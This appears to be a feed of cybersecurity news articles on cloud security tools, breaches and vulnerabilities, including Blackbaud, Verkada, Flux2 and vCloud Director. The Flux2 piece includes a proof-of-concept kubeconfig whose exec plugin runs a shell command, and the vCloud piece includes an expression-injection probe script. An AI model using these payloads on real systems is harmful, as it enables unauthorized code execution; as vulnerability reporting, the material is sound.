By detecting such bulk deletion activities, system administrators can be alerted to potential breaches or destructive actions in time to intervene and possibly prevent further damage. This rule helps in maintaining the security and operational integrity of environments where data persistence is a critical component.

By implementing these Falco rules, teams can significantly enhance the security posture of their Kubernetes deployments. These rules provide a foundational layer of security by monitoring and alerting on potential threats in real-time, thereby enabling organizations to respond swiftly to mitigate risks. As Kubernetes continues to evolve, so too will the strategies for securing it, making continuous monitoring and adaptation a critical component of any security strategy.

Top 5 Free Cloud Security Tools That Can Protect Your AWS & Azure Cloud Data From Hackers

The Cybersecurity and Infrastructure Security Agency (CISA) has compiled a list of free tools that businesses can use to protect themselves in cloud-based settings. According to the article published by CISA, these tools will assist incident response analysts and network defenders in mitigating, identifying, and detecting threats, known vulnerabilities, and anomalies in cloud-based or hybrid environments. During an attack, threat actors have generally focused on servers located on premises. However, the rapid expansion of cloud migration has drawn several threat actors to target cloud systems because of the many attack vectors the cloud presents.

Organizations that lack the capabilities needed to defend against cloud-based attacks may benefit from the tools CISA supplies. These tools can help users secure their cloud resources against data theft and information exposure.

CISA stated that companies should use the security features supplied by cloud service providers and combine them with the free tools it recommends in order to defend against these attacks. The tools CISA provides are:

  1. Cybersecurity Evaluation Tool (CSET).
  2. SCuBAGear.
  3. Untitled Goose Tool.
  4. Decider.
  5. Memory Forensic on Cloud (JPCERT/CC), an offering of Japan's CERT.

The Cybersecurity Evaluation Tool (CSET)

CISA created this tool to help enterprises assess their cybersecurity posture using standards, guidelines, and recommendations that are widely accepted in the industry. The tool asks multiple questions about operational rules and procedures, as well as about system design, and uses this information to generate a report that gives comprehensive insight into an organization's strengths and shortcomings, along with suggestions to remedy them. CSET version 11.5 includes the Cross-Sector Cybersecurity Performance Goals (CPGs), which were established by CISA in collaboration with the National Institute of Standards and Technology (NIST).

The CPGs provide best practices and guidelines that all organizations should follow, and the tool can help defend against prevalent and significant TTPs (tactics, techniques, and procedures).

SCuBAGear: M365 Secure Configuration Baseline Assessment Tool

SCuBAGear was developed as part of the SCuBA (Secure Cloud Business Applications) project, which was started in direct response to the supply chain compromise of SolarWinds' Orion software. SCuBAGear automatically compares an organization's M365 configuration against CISA's secure configuration baselines for Federal Civilian Executive Branch (FCEB) agencies. Alongside SCuBAGear, CISA has produced a number of materials that serve as a guide for cloud security and are useful to all types of enterprises. This work resulted in three documents:

  • SCuBA Technical Reference Architecture (TRA): offers fundamental building blocks for bolstering the security of cloud environments. Its purview covers cloud-based business apps (for SaaS models) and the security services used to safeguard and monitor them.
  • Hybrid Identity Solutions Architecture: provides best practices for tackling identity management in a cloud-hosted environment.
  • M365 Secure Configuration Baseline (SCB): provides baseline security settings for Microsoft Defender 365, OneDrive, Azure Active Directory, Exchange Online, and other services. SCuBAGear generates an HTML report detailing deviations from the policies outlined in the M365 SCB guidelines.

Untitled Goose Tool

Created in collaboration with Sandia National Laboratories, this tool is designed to help network defenders locate harmful behavior in Microsoft Azure, Azure Active Directory, and Microsoft 365, and it enables the querying, exporting, and investigation of audit logs. Organizations that do not import these logs into their Security Information and Event Management (SIEM) platform will find it especially helpful. It was designed as an alternative to the PowerShell tools available at the time, which lacked the capability to gather data from Azure, AAD, and M365.

Network defenders can use this tool to:

  • Extract cloud artifacts from Active Directory, Microsoft Azure, and Microsoft 365.
  • Perform time bounding of the Unified Audit Logs (UAL).
  • Collect data within those time bounds from Microsoft Defender for Endpoint (MDE).

Decider Tool

Decider helps incident response analysts map malicious activity to the MITRE ATT&CK framework, making ATT&CK techniques more accessible and guiding how analysts document adversary actions. Much like CSET, it asks the user a series of questions in order to identify the most applicable techniques. With this information, users can:

  • Export heatmaps from the ATT&CK Navigator.
  • Publish reports on the threat intelligence they have collected.
  • Determine and put into effect the appropriate preventative measures.
  • Prevent exploitation.

In addition, CISA has provided a link that describes how to use the Decider tool.

Memory Forensic on Cloud (JPCERT/CC)

Developed by JPCERT/CC, this tool builds an environment on AWS for constructing and analyzing Windows memory images using Volatility 3. Memory forensics is also needed for the recently popular living-off-the-land (LOTL) attacks, also known as fileless malware. Memory image analysis can be helpful during incident response engagements, which often call for high-specification equipment, significant time, and other resources just to prepare the analysis environment.

Blackbaud, a Cloud Software Provider, Fined $3 Million for Failing to Notify Customers of a Ransomware Attack

The U.S. Securities and Exchange Commission (SEC) announced today that Blackbaud Inc., a South Carolina public company that offers donor data management software to non-profit organizations, has agreed to pay $3 million to settle charges that it made misleading disclosures about a 2020 ransomware attack that affected more than 13,000 clients. The SEC alleges that Blackbaud's disclosures downplayed the severity of the attack to investors.

According to the SEC's order, Blackbaud announced on July 16, 2020, that the ransomware attacker had not accessed donors' personal information, such as bank account details or Social Security numbers. Within days of these claims, however, the company's IT and customer relations staff learned that the attacker had in fact accessed and exfiltrated this sensitive data. Because the company failed to maintain proper disclosure controls and procedures, those employees did not relay the information to the senior managers responsible for public disclosures. As a result, the quarterly report Blackbaud filed with the SEC in August 2020 omitted this material information about the scope of the attack and framed the risk of such donor data being accessed as merely hypothetical.

According to the quarterly report that was filed with the SEC in 2020 for the three months leading up to November 2020, Blackbaud had already been sued in 23 proposed consumer class action cases in the United States and Canada related to the ransomware attack and data breach that had occurred in May 2020.

The business also disclosed that government agencies and data regulators have also conducted investigations into the incident. These investigations include a multi-state, combined Civil Investigative Demand filed on behalf of 43 state Attorneys General and the District of Columbia.

Blackbaud also acknowledged in its July 2020 news release (which now redirects to the company's security website) that it had paid the ransom the attackers demanded after receiving assurances that all of the stolen data had been deleted.

"As the order finds, Blackbaud failed to disclose the entire effect of a ransomware attack despite its staff realizing that its prior public comments regarding the incident were erroneous," said David Hirsch, Chief of the SEC Enforcement Division's Crypto Assets and Cyber Unit. Blackbaud did not live up to its obligation, as a publicly traded company, to provide accurate and timely material information to its investors.

The SEC's order finds that Blackbaud violated Sections 17(a)(2) and 17(a)(3) of the Securities Act of 1933, as well as Section 13(a) of the Securities Exchange Act of 1934 and Rules 12b-20, 13a-13, and 13a-15(a) thereunder. Without admitting or denying the SEC's findings, Blackbaud agreed to pay a $3 million civil penalty and to cease and desist from committing violations of these provisions.

Which Security Solutions Can Protect Hybrid Data Centers From Attacks

It’s estimated that 80% of large businesses already deploy hybrid cloud arrangements.

The hybrid architecture combines the convenience of a cloud environment that can be ever-increased and scaled with on-premise centers that allow greater access control.

However, as organizations adopt this combined infrastructure for their corporate data centers, it raises many security concerns.

Data is interesting to cyber criminals. They can leak it, sell it to the highest bidder, use it to get into other organizations, and more.

And some companies might not even see attackers coming until they receive a ransom note or experience a major breach.

How do you protect information within complex hybrid environments? What makes protecting a Hybrid Data Center challenging?

Let's go over the most common difficulties that come up with hybrid data center protection.

Complex Infrastructure Seeks Simplified Security

With multi-cloud technology and hybrid data centers linked to everything from applications to endpoint devices of remote workers, it’s safe to say that modern business infrastructures are more complex than ever.

So, how do you protect data within such complex systems?

It seems counterintuitive, but as the architecture becomes more intricate, going back to basics and simplifying the security is the best way to go about protecting the company.

Normally, organizations add new security tools to protect new technology that they integrate into the existing infrastructure.

A complex cybersecurity infrastructure that consists of multiple tools means that analysts often lack a complete overview of the entire security.

Some ways that businesses can simplify their hybrid security include:

  • Automation with artificial intelligence
  • Unifying the versatile tools under the single dashboard

Artificial Intelligence Aids Security Analysts

The team of analysts that manages security already has a heavy workload. AI-powered tools help them keep their sanity by automating incident response where possible and continually managing the company's security posture.

The more work analysts can delegate to automation, the more time they have to dedicate to advanced threats or to automating parts of security.

More sophisticated attacks will require more of their time because such threats might bypass the radars of regular security solutions.

Behind such attacks can be a human who has spent months observing an organization to find its vulnerabilities, unlike automated malicious code that attacks any vulnerable company it can.

Such attackers target specific enterprises and wait for their opportunity to strike and obtain data.

In a nutshell, with AI, analysts can delegate repetitive tasks and focus their time on matters that require more brain power.

Unifying Security Tools

Another issue that analysts have to work with is continual alerts from different dashboards. On average, they get as many as 1000 alerts per day — depending on the size of the company. 

An overwhelming number of notifications pile up as companies deploy various security solutions from multiple vendors.

As most IT teams are well aware, the majority of these alerts don't indicate a high-risk issue that has to be dealt with right away. Bombarded with alerts, teams can brush off real problems, such as server issues, as false positives: dangerous mistakes that can cost companies millions.

IT teams have to switch between multiple dashboards — which decreases the visibility of the attack surface and causes dashboard fatigue due to frequent changes of the environment.

Having a centralized overview of the tools the company uses to secure its assets strengthens security while easing the burden on IT teams.

Therefore, increasing visibility of the security posture and tools is another important feature that companies should strive for when choosing security solutions.

Cyber Solutions Should Keep Up With a Company

Security should follow the growth and changes within the organization. Essentially, they should also be scalable without disrupting the workflow of a company.

Organizations will add new tools and new team members who connect to the infrastructure remotely. This might require protecting new security points and technology the company hasn't used before.

Therefore, it’s integral to have a security solution that keeps the ever-evolving nature of the company in mind and doesn’t create gaps in security amid the scaling of a business.

Catching Up With the Ever-changing Attack Surface

Besides the growth of the company, which can be slow and steady, security tools have to keep up with even more dynamic attack surfaces.

With people working both on and off the premises and with newly emerging hacking methods, the attack landscape can change in minutes, which is enough time for threat actors to exploit a vulnerability and reach data seemingly protected within the system.

As a result of the increased demand for remote work, more companies are using cloud technology than ever before. This also means that more sensitive data is being stored beyond the premises and accessed as users log into the system.

Protecting the information of the company, the users of its services, and its employees, both on premises and working from home, is a challenge because traditional security tools often can't keep up with frequent changes in the attack surface.

For example, zero-day attacks target systems with methods that are not known to analysts.

To protect data in hybrid data centers, it’s necessary to employ security tools that are capable of in-depth traffic inspection and continual monitoring. Thorough and comprehensive solutions can mitigate unwanted activity early – even if hackers use novel attacks.

To Sum Up

What makes protecting the hybrid data centers difficult is that there are many tools on the market that can’t be integrated together and require different dashboards.

As new tools are added, analysts have less visibility and control over the increasingly complex infrastructure.

To protect the data, a strong and scalable security solution is integral for preventing incidents such as data leaks and company breaches.

For hybrid data centers, this means having security that can guard the systems that hold data both on the cloud and on-premises.

Cloud Solutions for Healthcare Industry

In recent years, healthcare organizations have increasingly relied on cloud computing to acquire cloud healthcare solutions, and the healthcare system as a whole leaned on cloud computing during the pandemic. Information technology from software engineering service providers like Yalantis has helped deliver these technical solutions, which have benefited not only patients and doctors but also hospitals and clinics.

Better patient care, reduced costs, and remote access and collaboration are just a few of the advantages driving healthcare's growing adoption of cloud services. The adoption of cloud computing has opened new opportunities to improve the efficiency of healthcare IT systems.

One market report projects a 14.12 percent compound annual growth rate (CAGR) for the healthcare cloud computing market between 2022 and 2027, driving it to $71,730.64 million. As a result, healthcare institutions are open to new technologies and willing to invest in their development.

What are Cloud Solutions for Healthcare

Cloud solutions are software-as-a-service (SaaS), infrastructure-as-a-service (IaaS), and platform-as-a-service (PaaS) offerings that enable user organizations to store, process, and analyze data in a remote data center. In healthcare, cloud computing is primarily used to store medical data, manage medical records, and offer software tools for medical staff. Cloud solutions can help healthcare organizations with scalability, security, and compliance challenges by enabling remote access to data and applications. Healthcare organizations can choose from a wide range of cloud services to support their digital transformation and to address their unique challenges, such as compliance requirements or the need for high-performance computing.

Healthcare IT Market Overview

Market growth is fueled by rising healthcare costs and consumer demand for more efficient, cutting-edge treatment options. Raising consumer awareness of cutting-edge innovations that respond to unmet needs can further support that expansion. A 2020 Healthcare IT News report reveals that demand for healthcare IT services has increased, with remote monitoring services growing from 13% to 22%.

Growth in smartphone and internet penetration is also driving the spread of healthcare IT. A January 2022 data report puts the figures at 4.95 billion internet users and 5.31 billion mobile phone users, and The Mobile Economy 2020 predicts that by 2025 there will be 5.8 billion people using mobile devices. The number of people using the internet worldwide is expanding rapidly, by about 4% each year, having climbed by 192 million to a total of 4.2 billion in 2021. The expansion of the smartphone and internet industries is expected to help improve clinical results, patient satisfaction, and patient participation.

The aging population, the prevalence of chronic diseases, the rising cost of healthcare, and the growing demand for at-home care services such as remote patient monitoring are all likely to drive growth in the healthcare IT services industry. The rising prevalence of diseases like diabetes, cancer, hypertension, and cardiovascular disease is increasing the need for more practical information technology solutions. Healthcare IT adoption is encouraged by its ability to reduce medical errors, lower operational costs, and improve therapeutic outcomes. The expansion of the IT industry is also expected to be boosted by positive initiatives and official support from governments in developing countries.

The Covid-19 pandemic hampered care delivery but sparked interest in telemedicine and online advisory services around the world. Developments in the information technology sector, higher digital literacy rates, and more receptive consumer behavior helped meet this rising need.

Benefits of Cloud Solutions in Healthcare

For healthcare organizations, the benefits of the cloud include scalability, availability, reliability, and cost savings.

Scalability

Cloud solutions can grow or shrink based on fluctuating capacity needs, and the cloud architecture allows easy, cost-effective scaling as those needs evolve.

Availability

Cloud providers deliver high availability through redundant data centers, networks, and automated failover mechanisms. The cloud architecture allows for better uptime and availability of critical applications.

Reliability

Cloud providers take on hardware, software, and operational management, which increases reliability and operational efficiency. Healthcare organizations that run their own infrastructure must manage hardware and software themselves, which tends to mean higher costs and lower reliability.

Cost savings

Cloud solutions can reduce capital expenditures, operational expenses, and risk by shifting from on-premises hardware and software to a hosted service. Cloud adoption can also help accelerate innovation with the ability to test and deploy new solutions quickly.

Types of Cloud Computing in Healthcare

For the healthcare sector, cloud computing offerings can be grouped in two ways: by deployment model and by distribution model.

By Deployment

Private cloud – Limited to a single healthcare organization or network, a private cloud allows maximum security and exclusivity.

Community cloud – Multiple healthcare organizations can share the same cloud resources.

Public cloud – Access to the cloud is available to the general public.

Hybrid cloud – This model combines features from the deployment types above.

By Distribution

SaaS (software as a service) – The provider hosts ready-to-use applications on its own infrastructure and makes them available to client organizations over the internet.

IaaS (infrastructure as a service) – The provider hosts the servers, storage, and networking, while the client deploys and manages its own software on that infrastructure, allowing for easier application deployment.

PaaS (platform as a service) – The provider supplies the hardware, operating system, and supporting software as a platform on which clients build and run their applications.

How Is Cloud Computing Changing the Healthcare Industry?

It’s hardly surprising that more and more hospitals and clinics are looking into cloud services in healthcare. Cloud computing has found wide application across the sector, and its fundamental transformative changes include:

• Simple Collaboration: Patient data is now easily accessible to medical practitioners regardless of location, and linked domains such as drugs, insurance, and health payments have grown more connected.

• Advanced Data Mining: These days, a company’s data is its most precious possession. In healthcare, HIPAA compliance in the cloud ensures that only the most pertinent and well-structured information about an individual’s health is kept and made available. Analytics has advanced to the point where it can provide a deeper understanding of complex medical problems.

• Democratized Medical Data: Patients have become more involved in healthcare decisions. Greater awareness of their options, and a greater willingness to speak up for what they believe is best, results in a stronger sense of empowerment and involvement in their own healthcare.

Examples of Cloud Solutions in Healthcare

• Cloud-based Electronic Health Records (EHRs) – With a cloud-based EHR, providers can access patient information from anywhere and at any time. This facilitates better care coordination and maximizes the potential of a single source of truth.

• Cloud-based Patient Engagement – Cloud solutions can be used to host patient portals, enabling patients to view their health data, schedule appointments, and communicate with their providers.

• Cloud-based Clinical Workflow – With the adoption of cloud solutions, providers can integrate their EHR with other systems and use them to enhance clinical workflow. For example, providers can use a cloud-based solution to integrate patient data with a scheduling system.

• Cloud-based Security – Healthcare organizations can combine end-to-end encryption with a cloud-based solution to protect data in transit, at rest, and in use (a brief sketch of the idea follows this list).

• Cloud-based Data Analysis – Cloud solutions can be used to host data analytics tools, enabling providers to analyze their data and extract insights.
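
The “Cloud-based Security” item is the most concrete of these, so here is a minimal sketch of the client-side encryption idea in Python, assuming the third-party cryptography package; the record contents, key handling, and function names are illustrative only, not part of any specific product.

```python
# Minimal sketch: encrypt a record client-side so only ciphertext is
# uploaded to cloud storage. Assumes `pip install cryptography`.
from cryptography.fernet import Fernet

def encrypt_record(plaintext: bytes, key: bytes) -> bytes:
    """Encrypt a patient record before it leaves the organization."""
    return Fernet(key).encrypt(plaintext)

def decrypt_record(token: bytes, key: bytes) -> bytes:
    """Decrypt a record retrieved from cloud storage."""
    return Fernet(key).decrypt(token)

if __name__ == "__main__":
    key = Fernet.generate_key()  # in practice, keep this in a KMS or HSM
    record = b'{"patient_id": 123, "diagnosis": "hypertension"}'
    blob = encrypt_record(record, key)   # only this ciphertext is uploaded
    assert decrypt_record(blob, key) == record
```

In a real deployment the key would live in a managed key service rather than beside the data, which is what keeps the cloud provider outside the trust boundary.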

Cloud solutions for healthcare can assist with managing clinical and operational workflow, data security, and compliance and provide cost savings and scalability. These solutions can also be used to help accelerate innovation, provide remote patient access to services, and more.

Critical vulnerability in Flux2, a Kubernetes continuous delivery tool, enables hacking between neighboring deployments https://www.securitynewspaper.com/2022/05/19/critical-vulnerability-in-flux2-a-kubernetes-continuous-delivery-tool-enables-hacking-between-neighboring-deployments/ Thu, 19 May 2022 16:40:53 +0000

A recently detected vulnerability affecting Flux, a popular continuous delivery (CD) tool for Kubernetes, would reportedly allow tenants to sabotage the activities of “neighbors” that share the same off-premises infrastructure.

Flux is an open and extensible CD solution for keeping Kubernetes clusters in sync with configuration sources, and it is used by firms across all industries, including Maersk, SAP, Volvo, and Grafana Labs, among many others. Its most recent version (Flux2) introduced multi-tenant support, among other features.

The vulnerability was described as a remote code execution (RCE) error caused by improper validation of kubeconfig files, which can define commands to be executed to generate on-demand authentication tokens: “Flux2 can reconcile the state of a remote cluster when a kubeconfig file exists with the correct access rights,” notes a report posted on GitHub.

Paulo Gomes, a software engineer who contributes to the Cloud Native Computing Foundation (CNCF), which hosts both Flux and Kubernetes, explains: “The tool can synchronize the declared state defined in a Git repository with the cluster in which it is installed, which is the most commonly used approach, or it can target a remote cluster.”

Gomes adds that the access required to target remote clusters depends largely on the intended scope; this is completely flexible because Kubernetes RBAC offers a wide range of granularity. The behavior allows a malicious user with write access to a Flux source, or with direct access to the target cluster, to create a specially crafted kubeconfig file that executes arbitrary code in the controller container.
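
To make the mechanism concrete, here is a hedged sketch of the kind of crafted kubeconfig at issue: Kubernetes’ standard “exec” credential plugin lets a kubeconfig specify a command to run whenever an authentication token is needed, which is why a kubeconfig accepted without validation can lead to code execution. The cluster name, server address, and payload below are illustrative, not taken from the advisory.

```python
# Sketch of a kubeconfig abusing the "exec" credential plugin.
# Everything here is illustrative; do not aim this at systems you
# are not authorized to test.
import textwrap

MALICIOUS_KUBECONFIG = textwrap.dedent("""\
    apiVersion: v1
    kind: Config
    clusters:
    - name: remote
      cluster: {server: "https://example.invalid"}
    contexts:
    - name: remote
      context: {cluster: remote, user: attacker}
    current-context: remote
    users:
    - name: attacker
      user:
        exec:
          apiVersion: client.authentication.k8s.io/v1beta1
          # This command runs wherever the kubeconfig is consumed;
          # in the vulnerable scenario, the controller container:
          command: /bin/sh
          args: ["-c", "id > /tmp/pwned"]
""")

with open("kubeconfig-poc.yaml", "w") as fh:
    fh.write(MALICIOUS_KUBECONFIG)
```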

When scored under version 2 of the Common Vulnerability Scoring System (CVSS), the vulnerability was rated medium severity at 6.8/10, because in single-tenant deployments the error is less dangerous: an attacker must already hold nearly the same privileges that exploitation would grant.

However, the flaw scores 9.9/10 under CVSS v3.1, since that release includes a metric for ‘scope’ changes, meaning the flaw can affect resources beyond the security scope managed by the developers of the vulnerable component.

The flaw has already been addressed by the creators of the tool, so users of affected deployments are advised to upgrade as soon as possible.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The Future of Cloud Security https://www.securitynewspaper.com/2021/12/14/the-future-of-cloud-security/ Tue, 14 Dec 2021 15:00:00 +0000


The future of cloud security is dictated as much by the technology rising across the analyst magic quadrants as by the adversaries encroaching on businesses and corporate networks. A growing understanding of the blend of legacy and innovative technical solutions, of companies’ diverse security constraints, and of industry regulations is giving rise to new methods and approaches for enhancing security and for creating the fundamental processes that business continuity demands.

Below, we’ll outline some of the leading trends in cloud security, the critical technology defining the face and future of IT management, and some of the leading market segments taking center stage in the fight to secure the cloud.

Up-and-coming technologies and sectors

Cloud security is inextricably linked to the dynamic, rapidly evolving technology solutions and sectors created to mitigate its risks and improve data visibility. While all of these have arisen from decades of complex technical work, in recent years the new categories have begun centralizing and analyzing data at a level unheard of just a few short years ago.

With upwards of 92% of organizations hosting their data in the cloud, the need to enhance security and create essential layers of protection has never been greater. To address this increased focus on cloud security, two major categories appear to be leading the way in simplifying data visualization and providing clear mitigation value for system admins.

  • CSPM

According to Gartner: “Cloud Security Posture Management (CSPM) is a market segment for IT security tools that are designed to identify misconfiguration issues and compliance risks in the cloud. An important purpose of CSPM programming is to continuously monitor cloud infrastructure for gaps in security policy enforcement.”

CSPM solutions assist IT professionals in identifying and mitigating often complex cybersecurity risks across the cloud. By unifying and centralizing many cloud-based security and management tools, CSPM can effectively analyze configurations to detect potential security issues and fix misconfigurations before hackers can exploit them (a toy sketch of such a check appears after this list).

  • CIEM

Cybersecurity analysts are increasingly looking to the rise of CIEM technology to meet this strategic need, with businesses investing in the segment and incorporating CIEM components to manage cloud-based entitlement risk. CIEM fills a gap that legacy and other cloud security solutions do not address.

Simply put, CIEM tools enable enterprises to manage their cloud access risks more effectively through the governance of entitlements in hybrid and multi-cloud IaaS. What differentiates CIEM from its component parts is its ability to blend machine learning (ML) and other methods to detect anomalies in account entitlements in real time, providing privilege remediation and policy enforcement in a single process.
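
To ground the CSPM description referenced above, here is a toy Python sketch of the kind of automated misconfiguration check such tools run continuously: it uses boto3 to flag S3 buckets whose ACL grants access to all users. Real CSPM products evaluate thousands of rules across many services; this is an illustration, not a product implementation.

```python
# Toy CSPM-style check: flag S3 buckets readable by everyone.
# Requires `pip install boto3` and configured AWS credentials.
import boto3

ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"

def find_public_buckets():
    s3 = boto3.client("s3")
    flagged = []
    for bucket in s3.list_buckets()["Buckets"]:
        acl = s3.get_bucket_acl(Bucket=bucket["Name"])
        # Any grant to the AllUsers group means the bucket is public.
        if any(g["Grantee"].get("URI") == ALL_USERS for g in acl["Grants"]):
            flagged.append(bucket["Name"])
    return flagged

if __name__ == "__main__":
    for name in find_public_buckets():
        print(f"[!] Publicly accessible bucket: {name}")
```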

ROI and risk in cloud security

Cloud security is the result of effectively implemented firewalls and constant penetration testing. It is the realization of obfuscation, tokenization, and the use of virtual private networks (VPNs) to build a significant barrier against attack while keeping cloud-based assets secure. In practice, the more elements you add, the more complex the process becomes; even so, with the new management categories and the centralization of data in the cloud, some very clear ROI has already begun to be realized.

CIEM and CSPM systems provide value in:

  • Minimizing the impact of human error through automation and entitlement management
  • Centralizing visibility of cloud-based functions
  • Tracking thousands of identities with seamless integration and access to data points
  • Providing a process for detecting and rectifying anomalies
  • Remediating excessive entitlements and configuration risk

Key takeaways

Cloud security is not a buzzword or catchphrase pushed by IT to stoke fear and garner resources. It is the lifeblood of most companies’ data management strategy, and it is mission-critical for the continuity of any business with resources in the cloud.

According to the 2020 IDG Cloud Computing survey: “Cloud adoption levels that have held steady since 2015 have accelerated in the last two years with 81% of survey respondents reported already using computing infrastructure or having applications in the cloud, compared to 73% in 2018.” 

With cloud adoption taking center stage, and the risks of cloud migration and security following close behind, the need has arisen for new market segments that give previously disconnected tools a central role in visualizing data and mitigating risk. Through CIEM and CSPM solutions, organizations with data in the cloud can now bring that data together and mitigate cyber risk and human error, simplifying data management in the cloud.

Information from more than 100 million Android users exposed by massive data breach https://www.securitynewspaper.com/2021/05/20/information-from-more-than-100-million-android-users-exposed-by-massive-data-breach/ Thu, 20 May 2021 16:29:27 +0000

Cybersecurity specialists report that the personal information of around 100 million Android device users has been exposed due to incorrect security settings in cloud storage deployments. The information was found in databases lacking the necessary protections, linked to about 23 applications with between 10,000 and 10 million downloads each.

According to the experts who reported the incident, this is a sign of the poor security practices followed by some Android developers, and it undoubtedly poses a security risk. Researchers believe the problem is widespread and easily exploitable by threat actors.

The report presented by Check Point researchers mentions that some of the databases were unprotected, so any user who knows where to look can easily access the information. The compromised data includes details such as:

  • Full names
  • Phone numbers
  • Email addresses
  • Dates of birth
  • Text messages
  • Location details
  • Gender
  • Passwords
  • Payment details

Most apps related to this leak are available on the Google Play Store and are relatively popular on the platform. Among those with at least 10 million downloads are Logo Maker and Astro Guru; other, less popular apps, such as T’Leva, fall in the range of 10,000 to 500,000 downloads.

Researchers also found sensitive information reserved for the developers of these apps, including credentials for push notification services. They likewise found cloud storage access credentials for at least one app available on the Play Store.

Finally, the experts discovered that the iFax app for Android also stored cloud storage keys, and its database contained documents and fax transmissions from more than 500,000 users. They noted as well that some developers relied on security through obscurity, obfuscating the secret key with base64 encoding.
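
As a quick illustration of why base64 offers no real protection, the snippet below encodes and then trivially recovers a made-up key; none of these values come from the Check Point report.

```python
# Base64 is an encoding, not encryption: anyone who extracts the
# string from an APK can reverse it in one call.
import base64

SECRET = b"example-push-service-key"            # made-up value
obfuscated = base64.b64encode(SECRET).decode()  # what ships in the app
print(obfuscated)
print(base64.b64decode(obfuscated))             # the key, recovered
```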

Although the problem is not new, researchers are still surprised by the poor security practices employed by Android developers. To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

Cybercriminals hack over 150,000 security cameras; espionage risk active https://www.securitynewspaper.com/2021/03/10/cybercriminals-hack-over-150000-security-cameras-espionage-risk-active/ Wed, 10 Mar 2021 18:35:19 +0000

Verkada, a startup that provides a cloud-based security camera system, acknowledged that it was affected by a security incident that allowed threat actors to access more than 150,000 security cameras installed on the premises of all kinds of organizations, including Cloudflare, Tesla, and Equinox, as well as prisons, schools, and police stations.

Verkada sells internet-connected security cameras using the approach known as “software first.” The cloud-connected cameras include a sophisticated web-based interface through which businesses control their streams, and facial recognition software is offered as a premium option.

Soon after, Tillie Kottmann, a member of the international hacking collective responsible for the incident, stated that the goal was to show how vulnerable the systems operating the company’s security cameras are. In addition to live streams from affected cameras, the hackers would also have accessed the full video archives.

In this regard, a Verkada representative mentioned: “As a security measure, we deactivate all administrator accounts to prevent any unauthorized access to these resources; our security team is already in collaboration with an internal firm to investigate the actual scope of the incident.”

As for the attack method, the group appears to have gained “super administrator” access to the affected systems using a username and password exposed on the internet. From there, the threat actors reached the company’s entire network, including root access to the cameras and their live streams.

The company has also drawn criticism in the past over allegations of sexism and discrimination, following a 2019 incident in which a sales director used security cameras at its facility to harass co-workers and posted private images in Verkada’s employee Slack channel.

So far, improper access to Verkada cameras has been confirmed at facilities belonging to organizations such as Tesla, Cloudflare, Florida’s Halifax Health hospital, Sandy Hook Elementary School, and the Madison County Jail in Alabama, among other public and private organizations. The hackers also claimed to hold personal and financial information on thousands of the company’s users and employees.

The hackers who claimed responsibility for the attack have not yet said whether they intend to demand a ransom in exchange for not disclosing the information, although the cybersecurity community does not rule out a ransom demand in the coming days.

Vcloud Director vulnerability allows hacking networks of enterprises using VMware https://www.securitynewspaper.com/2020/06/02/vcloud-director-vulnerability-allows-hacking-networks-of-enterprises-using-vmware/ Tue, 02 Jun 2020 15:58:52 +0000

A group of database activity monitoring specialists has revealed a critical vulnerability in Cloud Director, a cloud resource deployment, automation, and management platform developed by VMware. Exploiting this vulnerability would allow threat actors to access sensitive information and take control of private cloud deployments across an entire infrastructure.

The security report mentions that the vulnerability can be exploited through the HTML5- and Flex-based user interfaces, the API Explorer interface, and API access. The flaw is present in versions 10.0.x earlier than 10.0.0.2, 9.7.0.x earlier than 9.7.0.5, and 9.1.0.x earlier than 9.1.0.4.

Database activity monitoring specialists from Czech firm Citadelo discovered the vulnerability after a company (whose name was not revealed, but which is known to be on the Fortune 500 list) hired the firm to conduct a security audit of its cloud infrastructure. The cybersecurity firm also published a proof of concept demonstrating the flaw’s exploitation.

“We discovered the flaw from a simple anomaly: when we entered ${7*7} as the host name for the SMTP server in vCloud Director, we received an error saying the string value is in an invalid format, indicating some form of expression language injection. We were able to evaluate simple server-side functions,” the Citadelo report says.
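
A rough sketch of how an auditor might reproduce that anomaly follows. The endpoint path and field name are illustrative guesses, not the actual vCloud Director API; the test simply checks whether the server evaluates the expression instead of treating it as a literal string, and should only ever be run against systems you are authorized to test.

```python
# Probe for expression language injection: submit ${7*7} where a
# hostname is expected and see whether "49" comes back. The endpoint
# and field name below are hypothetical.
import requests

TARGET = "https://vcloud.example.invalid/api/admin/smtp-settings"
payload = {"smtpServerName": "${7*7}"}

resp = requests.put(TARGET, json=payload, verify=False, timeout=10)
if "49" in resp.text:
    print("[!] Input was evaluated server-side: possible EL injection")
else:
    print("[-] No evaluation observed")
```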

According to the database activity monitoring experts, using this condition as an entry point, arbitrary Java classes (such as “java.io.BufferedReader”) can be accessed and instantiated by sending malicious payloads to the vulnerable software. In their proof of concept, the researchers were able to:

  • View the contents of the system database, including password hashes of the clients assigned to the deployment
  • Modify the system database to access virtual machines
  • Scale privileges from “Organization Administrator” to “System Administrator”
  • Modify the Cloud Director login page, allowing hackers to get other customers’ passwords
  • Access other sensitive customer-related data, such as full names, email addresses, or IP addresses

VMware acknowledged the report and announced the release of the relevant fixes, which are already available: the flaws are addressed in updates covering versions 9.1.0.4, 9.5.0.6, 9.7.0.5, and 10.0.0.2. The company also published a workaround on its website.

For further reports on vulnerabilities, exploits, malware variants, and computer security risks, cybersecurity awareness experts recommend visiting the International Institute of Cyber Security (IICS) website, as well as official technology company platforms.

400 vulnerabilities reported on Oracle, update your servers before hackers take control of them https://www.securitynewspaper.com/2020/04/14/400-vulnerabilities-reported-on-oracle-update-your-servers-before-hackers-take-control-of-them/ Tue, 14 Apr 2020 19:01:59 +0000

Despite the global slowdown in activity, reports of security flaws in technological developments continue to appear. Cloud security course experts mention that Oracle’s quarterly security update includes fixes for 405 different vulnerabilities, of which 286 can be exploited remotely.

The announcement about the update, released on Monday, mentions that a total of 13 Oracle products have security flaws that received 9.8/10 scores on the scale of the Common Vulnerability Scoring System (CVSS), including Oracle Financial Services Applications, Oracle MySQL, Oracle Retail Applications, and Oracle Support Tools.

On its own, the Oracle Fusion Middleware product needs fixes for 49 vulnerabilities that could be exploited by remote threat actors without authentication; in other words, the flaws can be exploited over a network without privileged user credentials, cloud security course specialists mention.

